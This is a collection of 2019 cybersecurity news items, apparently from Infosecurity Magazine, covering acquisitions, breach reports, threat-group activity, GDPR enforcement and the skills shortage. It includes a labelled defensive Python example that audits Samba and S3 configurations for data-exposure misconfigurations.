  7. Messagenius: The company's enterprise messaging tool for secure, smart and integrated communications among colleagues looks and works just like the company’s everyday messenger while protecting sensitive information.
  8. Panaseer: Its controls monitoring platform gives CISOs visibility of all assets and the confidence that security controls are working effectively.
  9. Quant Network: Its Overledger, the world’s first blockchain operating system, is considered to be leading the way for innovation and blockchain adoption.
  10. SaltDNA: Its product provides secure voice, messaging, conference calling, broadcasting and image or file transfers for busy executives.
  11. Security Alliance: Its cyber-threat intelligence platform, ThreatMatch, helps security analysts, operations teams and security managers focus on cyber-threats that will have the biggest impact on the organization.
  12. Storage Made Easy: Its multi-cloud software product, Enterprise File Fabric, provides a security and governance blanket for siloed company data.
  13. swIDch: Its patented algorithm enables payments companies to generate Dynamic PANs in a networkless environment without the need for any additional infrastructure.
  14. Threat Status: Its Trillion service collects, analyses and provides alerts on the billions of breached credentials from the deep web, closed forums, paste sites and the dark web, looking for the ones that belong to its clients.
  15. Uleska: This scalable platform provides continuous software security testing within DevOps software or IT projects, automating business-risk reporting and communicates security strategy value without the need for more personnel.

Louise Cushnahan, head of innovation at CSIT, said: “Having 15 companies join this cohort highlights the breadth of innovative and emerging cybersecurity focused activity within the UK ecosystem.”

AI Is “Fundamental” to Future of SME Cybersecurity

Research shows that small and medium enterprises (SMEs), while confident that artificial intelligence (AI) will be vital to the future of cybersecurity, do not feel certain about whether their investment in cybersecurity is worth the cost.

The report by AI cybersecurity company Senseon, The State of Cybersecurity, found that 81% of SMEs believe that AI will be able to improve the security posture of their organizations. A further 76% believe the technology will improve their day-to-day working lives.

Even though SMEs believe AI will positively affect their business, uptake of AI solutions within SMEs has been slow, with a 4% adoption rate. According to the report, aside from cost (52%), the results show that a lack of knowledge of AI (36%) and marketing hype (24%) are barriers to adoption.

The report also looked at other barriers to implementing cybersecurity, finding that over half (53%) of SMEs feel an increased budget would help them deal with cybersecurity workload. Further, security professionals are uncertain whether they will see return on investment on their current solutions; 49% believe the business will see an overall net loss due to cybersecurity investment. 

David Atkinson, CEO and founder of Senseon, commented, “Issues within SMEs surrounding security are centered around stringent budgets, and frantic adoption of more and more tools is likely resulting in needless costs for the businesses." 

"No matter what the maturity of a business or indeed the maturity of its security stack, it is vital that C-suite, IT and security teams rationalize their existing technologies and look to prove a strong return on investment, as well as protecting the business," he continued. "Ultimately, the cost of AI solutions is countered by its ability to automate the detection of threats and to augment the role of security analysts, which saves security teams valuable time by separating the signal from the noise and flagging the genuinely malicious threats.”

The report also shows that 69% of SMEs are looking to implement AI security solutions in the next five years and 44% are planning to invest in AI or machine learning defense in the immediate future. 

Sophos Acquires Rook Security to Bolster MDR Services

British cybersecurity company Sophos has acquired Rook Security, a provider of managed detection and response (MDR) services. The privately owned Rook provides a team of cyber-threat hunters and incident response experts who "monitor, hunt for, analyze and respond to security incidents" for businesses. 

Combining Rook's services with its recently acquired DarkBytes technology platform, Sophos is planning to create re-sellable MDR services for approximately 47,000 channel partners worldwide. In addition to this, Rook's team of security investigators will be able to use Sophos' security technology and products for the company's customers.

“Cyber-criminals are relentlessly trying to exploit organizations with techniques ranging from tried-and-true phishing emails to the more recent trend of ‘hacker pen-testing’ to find weaknesses in their surface area. As a result, businesses need 24-hour, seven-days-a-week monitoring and management of what is happening on their network, yet many of them do not have the expertise, can’t keep up or don’t have the security teams in house to optimally configure and manage security around the clock,” says Joe Levy, chief technology officer at Sophos. “With MDR, Sophos’ channel partners will be able to provide businesses of all sizes with expert services that continuously detect, hunt for and respond to security incidents.”

J.J. Thompson, founder and CEO of Rook Security, says that the company is excited by the acquisition: "Together, we can implement faster and more effective threat detection and response capabilities to better protect businesses." 

According to a press release, Sophos is releasing no further details at this time.

Sophos has been splashing the cash in 2019 with the additional acquisition of Avid Secure earlier on in the year. The purchases were for MDR services and cloud infrastructure, bolstering the company's offering. 

Over Half of UK Firms Failing on Privacy Compliance

UK firms are struggling with a complex patchwork of privacy regulations, with more than half now believing they’re failing with compliance efforts, according to new research from Thomson Reuters.

The news wire surveyed data privacy professionals at global organizations with an average of 16,000 employees before and after the GDPR came into force, to compile its latest report.

It found that UK businesses either have greater insight into their capabilities, or are genuinely falling behind their global counterparts when it comes to compliance.

Some 57% said they believe their business is failing to meet global compliance requirements, up from 44% in 2017. This compares with a global average of 48%, which falls further to 42% for US firms and just 31% in France.

UK companies are spending on average £840,000 annually to comply with global regulations, including the GDPR.

The new powers granted to regulators of monetary fines up to €20m or 4% of global annual turnover will be at the forefront of directors’ minds, according to Jim Leason, customer proposition lead for Legal Professionals Europe at Thomson Reuters.

“Many businesses are getting less comfortable over their GDPR compliance. More businesses now than a year ago believe they are failing to comply with all of their global data privacy-related obligations. Obviously, the comfort level businesses have with compliance is heading in the wrong direction,” he argued.

“What also seems to be coming through from our research is a sense that businesses feel legislators and regulators didn’t anticipate the major workload that GDPR entails.”

UK regulator the Information Commissioner’s Office (ICO) said it has received over 14,000 breach reports since the GDPR came into force, four times more than in the previous 12-month period.

Although it has consistently argued that GDPR compliance is an ongoing journey, and that it prefers to educate rather than penalize, major fines could be announced soon as the results of several investigations are published.

Confusion Reigns as C-Suite Bemoans Lack of Security Resources

Most C-level executives believe their organization is more exposed to potential security breaches because it lacks crucial technical, financial or human resources, according to new research from Nominet.

The .uk registry, which also offers DNS security services, polled 400 C-level executives in the UK and US to reveal boardroom attitudes to security risk.

Although most (76%) now understand that a breach is inevitable, 90% believe they’re missing something that would help mitigate cyber threats, namely advanced technology (59%), budget (44%) and staff (41%).

Another challenge highlighted by respondents was senior management being reluctant to accept advice (46%).

In fact, knowledge and responsibility gaps at the top could be severely hampering organizations’ ability to respond to such threats. There’s confusion over who is responsible for breach response, with over a third of respondents (35%) claiming it’s the CEO, while 32% pointed to the CISO. The vast majority of respondents (71%) also admitted to having gaps in their knowledge, especially about malware (78%).

There’s also confusion over breach reporting. Although 70% said incidents are initially reported to the security team, 61% said they go to the executive team and 40% to the board. A third of CEOs even claim they would fire any employee responsible for a breach, despite the admission that such incidents are inevitable.

Only half of CISOs feel valued by the board in terms of brand and revenue protection, with 18% believing the board thinks they’re an inconvenience. However, over half (52%) of directors said their CISO is a “must have.”

This confusion could be responsible for the moderate to high stress levels that most (91%) CISOs experience, damaging the mental health of over a quarter (27%), according to separate findings from the same research released by Nominet in February.

“This research is very much a case of ‘the good, the bad, and the ugly.’ It’s good to see that business leaders are aligned on the fact that cyber-attacks are pretty much an inevitable part of working life. Acceptance is the first step to protection. There’s also a dedication to keeping customer and client data safe,” argued Nominet CEO, Russell Haworth.

“But the bad comes with the power struggle at the top, with confusion over who should actually take responsibility in case of a data breach or cyber-attack, which is detrimental to the safety and security of the business. And the ugly is how CISOs feel within their organization.”

IEEE Lifts Restriction on Huawei Employees

The Institute of Electrical and Electronics Engineers (IEEE) has lifted a restriction on Huawei, meaning the firm’s employees can participate once again in reviewing and editing research papers.

The international technical organization had instituted the ban after the US Department of Commerce placed the Chinese giant and its affiliates on an Entity List.

This led to a furious response from the Middle Kingdom, where the China Computer Federation (CCF) said it would suspend all its interactions with the IEEE.

However, after seeking clarification from Washington, the crisis appears to have been averted, for now.

“Our initial, more restrictive approach was motivated solely by our desire to protect our volunteers and our members from legal risk. With the clarification received, this risk has been addressed,” the IEEE said in a statement.

“We appreciate the many questions and comments from our members and volunteers around the world and thank them for their patience as we worked through a legally complex situation. IEEE recognizes that science and technology are a global activity. We are proud of the work our members do around the world and we are dedicated to advancing technological excellence for the benefit of humanity.”

However, it’s not clear whether the lifting of the restriction will only last the duration of the 90-day temporary license recently issued to Huawei, which will allow US firms to continue to sell to the telecoms giant.

Widely reported as a climb down by Washington, the 90-day license could be viewed more accurately as a provision to give US firms more buffer time to adjust to the shock of losing one of their biggest tech clients.

The shutting out of Huawei employees from international associations like IEEE is a portent of things to come if the world’s two superpowers can’t find a way around the current stand-off.

Chinese Dating Apps Leak US User Data

An unsecured Elastic database associated with dating apps has been discovered by a security researcher, exposing easily identifiable data. Jeremiah Fowler, who has been working in the security software industry for over 10 years, found the database that held information about US dating app customers, including their sexual preferences, lifestyle choices, and whether they were unfaithful to their partners. Fowler wrote on Security Discovery, "it is easy for anyone to identify a large number of users with relative accuracy based on their 'User ID.'"

According to Fowler, the IP address for the database was located on a US server, with the majority of users appearing to be Americans. Even though the data was hosted for "multiple dating applications," upon further investigation he found them to have been developed by separate companies or individuals.

He was able to identify the users' real identities online, as the dating applications logged and stored the user’s IP address, age, location and user name. "Like most people, your online persona or user name is usually well crafted over time and serves as a unique cyber fingerprint," wrote Fowler.

He attempted to contact the email addresses associated with the applications and to identify the address and phone number using the Whois domain registration records. "The address that was listed there was Line 1, Lanzhou and when trying to validate the address I discovered that Line 1 is a Metro station and is a subway line in Lanzhou," he explained on his blog. "The phone number is basically all 9’s and when I called there was a message that the phone was powered off.

"I am not saying or implying that these applications or the developers behind them have any nefarious intent or functions, but any developer that goes to such lengths to hide their identity or contact details raises my suspicions. Call me old fashioned, but I remain skeptical of apps that are registered from a metro station in China or anywhere else."

Terry Ray, senior vice president and Imperva Fellow, told Infosecurity that he agrees with Fowler's sentiments: "There are several strange things about this leaky database, especially the fact that the applications appear to target English speakers yet have, at least in one app, a business location in China, as well as having all owner or admin contact falsified or unavailable. It makes you wonder who is storing this data from these particular dating apps and what the underlying purpose is.

"Furthermore, why are multiple dating apps storing their data in the same place, yet little or no connection between the apps, their product names or their business contacts?"

At the time of writing his blog, Fowler disclosed that the database was still "publicly accessible" and that, despite the large number of users, it contained no personally identifiable information. He had not received responses to his emails. "What concerns me most is that the virtually anonymous app developers could have full access to user’s phones, data, and other potentially sensitive information," he wrote. "It is up to users to educate themselves about sharing their data and understand who they are giving that data to. This is another wake-up call for anyone who shares their private information in exchange for some kind of service."

According to Verizon, 22% of data breaches in 2017 involved the use of stolen credentials, with 36% of compromised data being personal information such as name, birthday and gender.

"Although the article notes that this database wasn’t storing personally identifiable information, the writer was, in fact, able to ‘identify’ some of the ‘persons’ with the credentials found; this highlights the importance that if you are storing user data, you are responsible for ensuring that data is protected," Ray told Infosecurity. "Further, if you’re an app user and want to remain anonymous, make sure you use different usernames and passwords as much as possible."

Checkers and Rally’s Victims of Data Breach

On Wednesday, Checkers Drive-In Restaurants alerted customers that it had been dealing with a data security issue involving "malware at certain locations."

On its website, the restaurant group announced that after discovering the issue, it "engaged leading data security experts to conduct an extensive investigation." Federal law enforcement authorities have also been informed in order to address the matter, with all parties working to contain and remove the malware.

"After becoming aware of a potential issue, we retained data security experts to understand its nature and scope," Checkers wrote on its website. "Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests." According to the website, not all locations were affected by this issue.

The malware was reportedly designed to "collect information stored on the magnetic stripe of payment cards." This included cardholder name, payment card number, card verification code and expiration date. Checkers is working with payment card companies to protect cardholders.

The restaurant group has recommended that card users "remain vigilant" and review account statements. "If you believe there is an unauthorized charge on your card, please contact your financial institution or card issuer immediately," the website states. 

Other recommendations include ordering a credit report: "When you receive your credit report, review it carefully," the website continues. "Look for accounts you did not open, for names of creditors from whom you haven’t requested credit." 

The law firm of Federman & Sherwood has initiated an investigation into the data breach.

TA505 Suspected in Chilean Financial Institutions Malware Attacks

Investigators from CyberInt Research have identified further activities by the suspected Russian-speaking cyber-gang TA505, targeting financial institutions in Chile. The cyber-gang is continuing its "unauthorized and nefarious use of the same TTPs of legit software, this time leveraging MSI Installer to deploy the AMADAY malware family," according to the company.

The AMADAY implant allows cyber-criminals to steal financial institutions’ and retailers’ clients’ email correspondence and sensitive information. This further enables them to steal contact lists, allowing them to target additional organizations by sending seemingly legitimate malicious emails that appear to come from trusted sources.

TA505 has been active since 2014, with high-volume malicious email campaigns distributing the Dridex and Shifu banking Trojans, as well as the Neutrino botnet/exploit kit and Locky ransomware. The group reappeared as the source of recent attacks against the global financial and retail industry from December 2018 to the present, with attacks worldwide, including in India, Italy, Malawi, Pakistan, South Korea and the United States.

“TA505 is highly motivated, very clever, and persistent,” says Adi Peretz, head of research at CyberInt. “It’s critical to monitor their activities to anticipate further attacks. Once the pattern of attacks in Chile was identified, other financial institutions can beef up their security, so they don’t end up being breached."

“Social engineering works because it recruits the weakest link in any cybersecurity operation – we humans,” continues Peretz. “The more prepared companies are, the better they can train their people to maintain security.”

In April 2019, Infosecurity Magazine reported that TA505 was using the TektonIT remote administration tool to target financial and retail institutions. CyberInt found that the tool was "virtually undetectable" by threat protection systems because it is "legitimate software."

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," according to a CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

Cybersecurity Jobs Added to Government’s Shortage Occupation List

Cybersecurity engineers and analysts have been identified as being on the Shortage Occupation List (SOL), in the first full review of officially recognized careers where the shortages “are most severe and where the consequences of those shortages are most serious” since February 2013.

According to the UK Government’s Migration Advisory Committee (MAC), “job shortages in roles such as cybersecurity analysts/engineers and IT network engineers” are now recognized, while the “occupation as a whole ranked highly in our shortage indicators and had an above average vacancy rate.”

In the previous partial update, published in 2015, the job “cybersecurity specialist” was added under the section “information technology and communications professionals not elsewhere classified.” Then, the shortage related to “a person with a minimum of five years’ relevant experience and demonstrable experience of having led a team.”

Since the 2015 partial update, while the need for more skilled cybersecurity professionals remains in this list, it now states “there will be no minimum experience requirement as applying an experience caveat could hinder the development of cybersecurity at all levels.”

This change in requirement follows criticism of hiring practices, where demanding five to 10 years’ experience is common and cited as a deterrent to new applicants.

In an email to Infosecurity, Ed Williams, director EMEA of SpiderLabs at Trustwave, said: “The security industry is to blame to some degree, there is very much a gatekeeper philosophy, which is starting to be broken down, but not nearly quick enough from my perspective. This industry is so fast paced and exciting, we should be pulling in the brightest and best - these don’t have to come from Computer Science backgrounds.”

The MAC described the impact of the skills shortage on cybersecurity development, saying that there have been reported delays to “software improvements and features as they do not have the labor or expertise to fulfil demand” and that this has led to “an increasing reliance on workers from outside the UK and there is a growing concern surrounding the future skills base for roles within new technical areas.”

The MAC cited “several sources amongst Government and the private sector” who agreed that there is a shortage of digital skills within the UK, evidenced by consistent vacancies in digital occupations, growth in demand for digital skills, and documented deficiencies across the population in terms of digital skill. The MAC also acknowledged that “there is not enough domestic supply of sufficiently skilled labor to fill this demand.”

According to Deloitte’s Digital Disruption Index for 2019, only 18% of respondents believe that UK school leavers and graduates have the right digital skills, while only 25% of digital leaders in the UK believe their workforce has sufficient knowledge and expertise to execute their digital strategy.

In the section 'Digital and IT Occupations,' careers as IT specialist managers, IT project and programme managers, IT business analysts, architects and systems designers, programmers and software development professionals, web design and development professionals, and information technology and telecommunications professionals were listed as being in shortage. Cybersecurity careers appeared under section SOC 2139 - information technology and telecommunications professionals.

The MAC said that “short-term mitigations have helped to fill shortages to some extent, but this has had limited impact as the skills required simply are not available.”

As well as short-term mitigations, the MAC said that long-term strategies also have their limitations, as up-skilling staff “is constrained by the lack of expertise in newer areas such as cybersecurity and secondly, these strategies are yet to mature, and so the scale of their impacts cannot truly be assessed until the future.”

The UK’s Digital Strategy states that “there will be even greater demand for people with specialist digital skills” as the digital economy grows.

“As we leave the European Union, it will be even more important to ensure that we continue to develop our home-grown talent, up-skill our workforce and develop the specialist digital skills needed to maintain our world leading digital sector,” then Secretary of State for Culture, Media and Sport Karen Bradley MP stated.

She acknowledged then that “a strong pipeline of specialist skills - from coding to cyber” was needed, and initiatives like the NCSC’s CyberFirst have helped to build that. However, a more immediate solution is needed until the next generation begins work.

To be placed on the SOL, a job must meet three requirements:

  • Skilled (are the jobs skilled to the required level?)
  • Shortage (is the job in shortage?)
  • Sensible (is it sensible to try to fill those shortages through migration?)

According to the Migration Advisory Committee, being on the SOL conveys certain advantages:

  • Not having to conduct a Resident Labour Market Test (RLMT)
  • Exemption from the £35,000 minimum income threshold for settlement
  • Priority in the event that the cap binds

The last Cybersecurity Workforce Study from (ISC)2 claimed that there is a 2.9 million workforce “gap,” with the APAC region suffering the biggest shortfall of 2.14 million, followed by North America (498,000), EMEA (142,000) and Latin America (136,000).

Drone Use on the Rise, Public Safety at Risk

Cybersecurity research firm IOActive has issued a stark warning about the potential, unseen risks surrounding the commercialization of drones – calling for manufacturers to take action.

In July 2018, analysts at Technavio predicted that the commercial drone market would grow by 36% (generating $11.61bn) between 2018 and 2022, but with that growth, IOActive has raised concerns about a range of new risks that could follow.

IOActive claimed that if the commercial market for drones is left unchecked, then we could start to see drones being weaponized, presenting potential hazards and threatening the safety of the public.

As drones become more commercially accessible and their functionality improves, they will also become more affordable, but what so often fails to keep pace when new tech such as this grows in popularity is the in-built security that keeps it safe from malicious interference.

IOActive pointed to some key drone security risks that could arise as a result, including how malicious actors could program drones to fly to specific GPS coordinates to launch cyber-attacks on Wi-Fi networks (or other types of wireless networks), or even perform man-in-the-middle attacks and disseminate malware.

What’s more, there is also the real risk of disruption – seen recently in the chaos caused by drone sightings at Gatwick airport – and injury, with the potential for hacked drones to be used to ‘dive-bomb’ pedestrians or impact traffic intersections, IOActive explained. Then there’s the privacy issues, IOActive added, highlighting that drones have the capability to take photos and record audio and video in otherwise impossible to reach areas.

“With enough determination anything can be hacked, but the commercialization of the drone market is making it all too easy – and many of the consequences for security, safety and privacy have simply not been thought through,” said Cesar Cerrudo, CTO at IOActive.

“The range of drones is of particular concern as it opens up new areas of vulnerability that many will not have considered.”

Cerrudo urged manufacturers to shoulder their share of the responsibility for the products they are bringing to market to ensure they are as secure as possible.

“The relative speed at which these devices are taking to the sky raises several issues. While the use of drones within the military has been common for many years, those drones have been rigorously tested and built with security in mind – commercial manufacturers do not have the same concerns, they are more focused on getting their product to market than ensuring cybersecurity. This attitude needs to change.”

UK Universities Facing Daily State-Sponsored Attacks

UK universities are facing increased attacks from state-sponsored hackers, who are targeting their research programs.

According to a survey of 75 senior IT leaders across 68 UK universities by VMware and Dell EMC, a quarter of respondents said their institution is targeted on a daily basis, while one in 10 strongly agreed that a successful attack on their research could have a harmful impact on the lives of UK citizens.

The research also found that 24% of UK universities believed their security and defense research may have already been infiltrated, while over half (53%) said a cyber-attack on their institution has led to research ending up in foreign hands.

John Chapman, CISO, UK Public Sector at Dell EMC, said: “In conducting research that may shape the future of the nation and its citizens, universities are under the microscope of some of the world’s most well-resourced and potent cyber-attackers. We hope this study will encourage them to look critically at their cybersecurity readiness. Universities must do more to protect themselves, and the sensitive information they hold, against the ever-expanding range of increasingly sophisticated threats.”

Specifically, cyber-criminals target scientific (54%), medical (50%), economic (37%) and defense research (33%). The research also found that 49% of university IT leaders recognize that a lack of IT investment is one of the forces driving the need for more robust cybersecurity practices.

In a statement sent to Infosecurity, Universities UK said: "Data security is an absolute priority for higher education providers and students alike. Universities UK is working with university leaders and the National Cyber Security Centre to help improve and strengthen security practices to better protect the sector from cyber threats. This includes the development of robust guidance on cybersecurity which we will release later this year.”

Insight Venture Partners to Acquire Recorded Future

Insight Venture Partners has agreed to acquire a controlling interest in Recorded Future, a threat intelligence company, in addition to the minority stake it already owns. The all-cash transaction puts the value of Recorded Future at more than $780 million. 

According to its press release, Recorded Future is the largest privately held threat intelligence software company in the world, with more than 400 clients. Its solution is powered by its patented machine learning, alerting companies to unknown threats before they affect the business, helping teams respond to alerts 10 times faster. The solution pulls information from technical, open web and dark web sources and aggregates it with customer data. 

Insight Venture Partners is a leading global capital and private equity firm investing in high-growth technology and software companies. Founded in 1995, it has over $20 billion of assets under management and has cumulatively invested in over 300 companies worldwide.

According to Recorded Future's co-founder and CEO, Christopher Ahlberg, the investment will help the company "tap into the full potential of its technical roadmap" and solve some of "the most difficult and unique intelligence challenges" today.  

“My leadership team and I have had the privilege to work with Mike Triplett and the Insight team for a number of years, benefiting from their sage advice, industry knowledge and relationships," he commented. "This transaction is the logical next step for Recorded Future given the opportunities in front of us, as we fully realize the potential and vision of our strategy.”

Triplett, managing director at Insight, said: “Insight’s renewed investment is a testament to the vision and direction laid out by Recorded Future’s leadership team. They envision a world where everyone applies intelligence at speed and scale to reduce risk, remaining hyper-focused on providing clients with the threat intelligence necessary to understand their environments, manage risk, and combat malicious actors through contemporary awareness gained from the implementation of a threat intelligence-led security strategy." 

Pursuant to the terms of this investment, Triplett and Thomas Krane, VP at Insight, will join Recorded Future’s board of directors.

Recorded Future customers have included Bank of America, Nasdaq, Abbott and T-Mobile. 

Companies and Experts Call on GCHQ to Abandon “Ghost User” Proposal

Technology companies, trade associations, civil society organizations and 17 individual experts in digital security and policy have signed an open letter to the UK's Government Communications Headquarters (GCHQ), outlining concerns regarding a proposal by the intelligence center on allowing access to encrypted devices. The letter was shared with GCHQ on May 22, 2019, and made public on May 29, 2019.

GCHQ set forth its proposal for “silently adding a law enforcement participant to a group chat or call” in a Lawfare article in November 2018. This would "add a ghost user into encrypted chats" and would "require providers to suppress normal notifications to users." According to the letter, this would leave users "unaware that a law enforcement participant had been added and could see the plain text of the encrypted conversation."

Written by Sharon Bradford Franklin and Andi Wilson Thompson, the letter to GCHQ explains how the ghost proposal would work, the ways in which technology companies would need to change their systems and the dangers that it would present. Specifically, the consortium outlined that if implemented, such access would “undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused.” 

Jake Moore, security specialist at ESET, told Infosecurity that the proposal by GCHQ "makes a mockery of the fundamental basics of encryption."

"Not only is it going against what privacy is all about, but if you create a back door for the good guys, the bad guys won’t be far behind. Encryption is there for multiple reasons and shouldn’t be messed with. GCHQ has always had an issue with breaking serious encryption but to now demand access to private chats has far-reaching implications. 

"Cyber-criminals are not just using WhatsApp and, if a law one day passes to read this application, it will just push them to use another app – if they aren’t already. There are many apps which already promise ultimate privacy and are heavily used and relied upon.”

The open letter from the group asks GCHQ "to abandon the ghost proposal and any other approach that would pose similar risks to digital security and human rights." They also request an open dialogue with the intelligence organizations to address law enforcement access to encrypted chats and messages. 

This news comes after Germany proposed giving access to security authorities to apps such as WhatsApp and Telegram. 

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches

Organizations are not equipping themselves against privileged access abuse, according to a report by Centrify and Techvangelism. Nearly 80% of organizations were found not to have a mature approach to privileged access management (PAM), yet 93% of the organizations surveyed believe they are at least somewhat prepared for threats that involve privileged credentials. 

“This survey indicates that there is still a long way to go for most organizations to protect their critical infrastructure and data with mature privileged access management approaches based on zero trust,” says Tim Steinkopf, CEO of Centrify. “We know that 74% of data breaches involve privileged access abuse, so the overconfidence these organizations exhibit in their ability to stop them from happening is concerning."

The report found that companies do not take "the simplest" of measures, with 52% stating they do not use a password vault. In fact, out of the 1,300 organizations across 11 industry verticals in the U.S. and Canada, 43% were identified as having a "nonexistent" PAM approach. 

The survey also revealed that over half of companies surveyed have some questionable privileged access control; for example, 52% use shared accounts for controlling privileged access; 58% of organizations do not use multifactor authentication (MFA) for privileged administrative access to servers, and 51% of organizations do not control access to transformational technologies with privileged access, including modern attack surfaces, such as cloud workloads, big data projects and containers.

Looking at industry-specific trends, 39% of technology organizations have a nonexistent approach to PAM, as do healthcare (45%) and government (42%), which are both highly regulated and handle sensitive data. The financial sector scored highest in the "mature" category, followed by energy and utilities (26%). 

Cathy Hall, PAM practice lead at Sila Solutions Group, wrote about the best practice for PAM for Infosecurity Magazine in April 2019: "The best way to handle ... PAM ... isn’t to simply check a box to satisfy a mandate, it’s to view it as a mission. A mission-based approach ensures that you improve security across your whole enterprise over time, rather than only satisfying a limited, one-time mandate." 

Report: 50% Increase in Exposed Data in One Year

New research released by digital risk protection specialists Digital Shadows has revealed a 50% increase in exposed data in the last year.

In its report Too Much Information: The Sequel from its Photon Research Team, Digital Shadows discovered that misconfiguration of commonly used file storage technologies was largely to blame for the exposure of 2.3 billion online files in one year. That is a jump of more than 750 million files since the same study was carried out by Digital Shadows in 2018.

Almost half of the files were exposed via the server message block protocol, whilst other technologies such as FTP services (20%), rsync (16%), Amazon S3 ‘buckets’ (8%) and network storage devices (3%) were also cited by Digital Shadows as sources of exposure.

Speaking to Infosecurity, Harrison Van Riper, Photon Research analyst at Digital Shadows, said: “It is surprising to see such a large increase in such a short amount of time, indicating that the issue of inadvertent data exposure is not one to be taken lightly.”

However, it is not just the sheer volume of data exposed in the last 12 months, or even the means by which it was exposed, that causes concern: the sensitivity of the exposed data is also a significant issue. Digital Shadows warned that with exposed data including passport details, bank records, medical and business information, organizations and individual consumers are at greater risk of GDPR penalties, targeted business compromise, identity theft and ransomware attacks.

“Every day, there are new files being exposed that are potentially sensitive personal or private information for businesses and consumers alike,” Van Riper added. “Our research shows that in a GDPR world, the implications of inadvertently exposed data are even more significant. Countries within the European Union are collectively exposing over one billion files – nearly 50% of the total we looked at globally – some 262 million more than when we looked at last year. Some of the data exposure is inexcusable – Microsoft has not supported SMBv1 since 2014, yet many companies still use it. We urge all organizations to regularly audit the configuration of their public facing services.”
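
The audit Van Riper calls for can be started from configuration alone. The following is an added example, not tooling from Digital Shadows or its report: it checks two of the storage technologies the report names, a Samba file server (for an SMBv1 minimum dialect, guest mapping and anonymous shares) and an S3 bucket policy (for statements that grant access to everyone). The smb.conf text, the bucket policy, the bucket name and the account id are all constructed for this example.

```python
"""Added example (not Digital Shadows' tooling): audit a Samba config and an
S3 bucket policy for the misconfigurations that lead to inadvertent exposure.
The config text and policy document below are constructed for this example."""
import json

# Samba dialect names, oldest first. NT1 is SMBv1; anything below SMB2_02 is legacy.
SMB_DIALECTS = ["CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1",
                "SMB2_02", "SMB2_10", "SMB3_00", "SMB3_02", "SMB3_11"]

# Constructed sample smb.conf with a legacy dialect, guest mapping and an open share.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server min protocol = NT1
   map to guest = Bad User

[public]
   path = /srv/public
   guest ok = yes
   writable = yes

[finance]
   path = /srv/finance
   valid users = @finance
"""

# Constructed sample bucket policy: one world-readable statement, one scoped to a role.
SAMPLE_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"},
        {"Sid": "TeamWrite", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/uploader"},
         "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::example-bucket/*"},
    ],
})


def parse_smb_conf(text):
    """Minimal smb.conf reader: {section: {key: value}}, keys lower-cased."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def _truthy(value):
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text):
    """Return findings for SMBv1, guest mapping and anonymously readable shares."""
    conf = parse_smb_conf(text)
    findings = []
    g = conf.get("global", {})
    # Samba 4.11+ defaults to SMB2_02 when the option is absent; older builds default lower
    # (assumption: treat an absent option as the modern default).
    min_proto = g.get("server min protocol", "SMB2_02").upper()
    if min_proto in SMB_DIALECTS and SMB_DIALECTS.index(min_proto) < SMB_DIALECTS.index("SMB2_02"):
        findings.append(f"global: server min protocol = {min_proto} still allows SMBv1")
    if g.get("map to guest", "Never").lower() != "never":
        findings.append(f"global: map to guest = {g['map to guest']} turns failed logins into guest sessions")
    for name, share in conf.items():
        if name == "global":
            continue
        if _truthy(share.get("guest ok", g.get("guest ok", "no"))):
            mode = "read/write" if _truthy(share.get("writable", share.get("writeable", "no"))) else "read-only"
            findings.append(f"share [{name}]: guest ok = yes exposes it anonymously ({mode})")
    return findings


def audit_s3_policy(policy_json):
    """Return findings for Allow statements whose principal is everyone."""
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        principal = stmt.get("Principal")
        is_public = principal == "*" or (isinstance(principal, dict) and principal.get("AWS") in ("*", ["*"]))
        if stmt.get("Effect") != "Allow" or not is_public:
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        # A Condition block may narrow a public grant; it still deserves a human look, so flag it regardless.
        findings.append(f"{stmt.get('Sid', '<no Sid>')}: Principal * allowed {', '.join(actions)} on {stmt.get('Resource')}")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF) + audit_s3_policy(SAMPLE_BUCKET_POLICY):
        print("FINDING:", finding)
```

Run against a real server, the same functions take the contents of /etc/samba/smb.conf and the output of the bucket's policy document; the point is that the three most common exposure causes in the report (a legacy dialect, guest access and a wildcard principal) are all visible in static configuration before any data leaves.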

Fines Increase & Enforcements Fall in First Year of GDPR

Data protection monetary penalties have increased by £2m in the past year, while the number of enforcements issued fell by more than 20 from the number issued in 2017.

According to PwC’s 2018 Privacy & Security Enforcement Tracker, monetary penalties issued to UK organizations for breaching data protection laws in calendar year 2018 totaled more than £6.5m, over £2m more than the previous year.

The data also showed that while the total sum of fines has increased, the number of enforcements issued fell to 67 in 2018, from 91 in 2017.

A year on from the GDPR compliance deadline, the data also showed that private sector companies accounted for 86% of the enforcements, but scrutiny remains on the public sector given the sensitive nature of the data it handles. A quarter (25%) of enforcement actions related to personal data security breaches.

Stewart Room, lead partner for GDPR and data protection at PwC, said that the trend of enforcement remained constant in comparison with previous years, with marketing and security infringements dominating the regulatory agenda.

